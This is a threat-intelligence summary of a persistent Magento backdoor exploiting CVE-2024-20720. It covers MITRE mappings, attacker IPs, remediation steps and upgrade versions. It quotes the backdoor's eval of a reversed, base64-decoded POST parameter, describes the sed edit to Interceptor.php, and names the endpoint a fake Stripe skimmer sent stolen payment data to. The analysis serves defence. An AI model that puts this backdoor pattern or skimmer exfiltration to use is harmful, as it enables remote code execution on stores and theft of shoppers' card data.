cyware: Persistent Magento backdoor hidden in XML

Attackers injected PHP shell code into the XML stored in Magento’s layout_update table, abusing the layout parser and the beberlei/assert package to execute system commands and install a persistent remote code execution backdoor. The backdoor is triggered via POST to /cms/index and was used to deploy a fake Stripe skimmer that exfiltrated payment data to a compromised store; affected sites should patch to fixed Magento versions and scan for hidden backdoors. #Magento #CVE-2024-20720

Keypoints

Threat actors injected shell code into the XML stored in the layout_update database table to trigger code execution.
The attack chains the Magento layout parser with the default beberlei/assert package to execute system commands on requests to /checkout/cart.
A sed command was used to modify the generated CMS controller (Interceptor.php) to add an eval-based backdoor that executes POSTed payloads.
The backdoor accepts a POST parameter (7faa27b473), reverses and base64-decodes it, then evals it, allowing remote code execution via /cms/index.
The activity is the first observed abuse of CVE-2024-20720 and also delivered a fake Stripe payment skimmer that posted stolen data to a compromised store domain.
Observed attacker IPs include 45.146.54.58, 45.146.54.59, 45.146.54.61, 45.146.54.67, 216.73.163.170, and 216.73.163.182.
Recommended mitigation: run an eComscan to find hidden backdoors and upgrade Magento to 2.4.6-p4, 2.4.5-p6, or 2.4.4-p7.

MITRE Techniques

[T1190] Exploit Public-Facing Application – Used a Magento vulnerability to inject shell code into the layout_update XML, enabling remote modification of application behavior (‘The attack involved injecting shell code into the XML code of the layout_update database table.’).
[T1574] Hijack Execution Flow – Modified generated CMS controller code so execution flow checks for a POST key and evals supplied payloads, causing the application to run attacker code on normal requests (‘___init();n if ( isset ( $_POST [ “7faa27b473” ]) ) { … @ eval ( $catalogQuery ( strrev ( $_POST [“7faa27b473”] ) ));’).
[T1505] Server Software Component – Persisted a backdoor by altering the automatically generated interceptor file via sed to ensure reinfection even after manual fixes or compilation (‘sed -i … adds a backdoor to the (automatically generated) CMS controller.’).
[T1059] Command and Scripting Interpreter – Executed dynamically supplied PHP via eval after reversing and base64-decoding a POST parameter, enabling arbitrary command execution (‘@ eval ( $catalogQuery ( strrev ( $_POST [“7faa27b473”] ) ));’).
[T1041] Exfiltration Over C2 Channel – Exfiltrated stolen payment data to an externally controlled URL on a compromised Magento store (‘copy payment data to https://halfpriceboxesusa.com/pub/health_check.php’).

Indicators of Compromise

[IP Address] attacker hosts observed – 45.146.54.58, 45.146.54.59, and 4 more IPs (45.146.54.61, 45.146.54.67, 216.73.163.170, 216.73.163.182).
[Domain] exfiltration endpoint – https://halfpriceboxesusa.com/pub/health_check.php (used by the fake Stripe skimmer to receive stolen payment data).
[Database table] injection location – layout_update (XML entries in this table contained the malicious payload).
[File path] modified/generated file – ../generated/code/Magento/Cms/Controller/Index/Index/Interceptor.php (sed was used to insert the backdoor here).
[CVE] exploited vulnerability – CVE-2024-20720 (vulnerability leveraged in the attack).

Attackers placed PHP shell code inside the layout_update XML so that Magento’s layout parser, combined with the beberlei/assert package, executes it when the checkout/cart layout is requested. The injected XML triggers a sed command that edits the automatically generated Interceptor.php for the Magento CMS index controller; the sed payload inserts an initialization check that looks for a specific POST parameter (7faa27b473), reverses and base64-decodes its value, and then passes it to PHP eval, creating a remote code execution backdoor accessible via /cms/index.

The malicious workflow ensures persistence and periodic reinfection: because the layout block ties to checkout cart requests and the injected XML can reapply the sed modification, manual fixes or running bin/magento setup:di:compile may not remove the backdoor without cleaning the layout_update entry. The attacker also deployed a fake Stripe skimmer that exfiltrated payment information to a compromised Magento domain (https://halfpriceboxesusa.com/pub/health_check.php), demonstrating combined remote code execution and data theft.

Immediate technical remediation steps are to scan for hidden backdoors (the article recommends eComscan), inspect and clean layout_update entries, verify and restore any altered files under generated/code (especially Interceptor.php), and upgrade Magento to a patched release (2.4.6-p4, 2.4.5-p6, or 2.4.4-p7). Rotate credentials, review access logs for the listed IPs, and block or investigate the observed attacker hosts.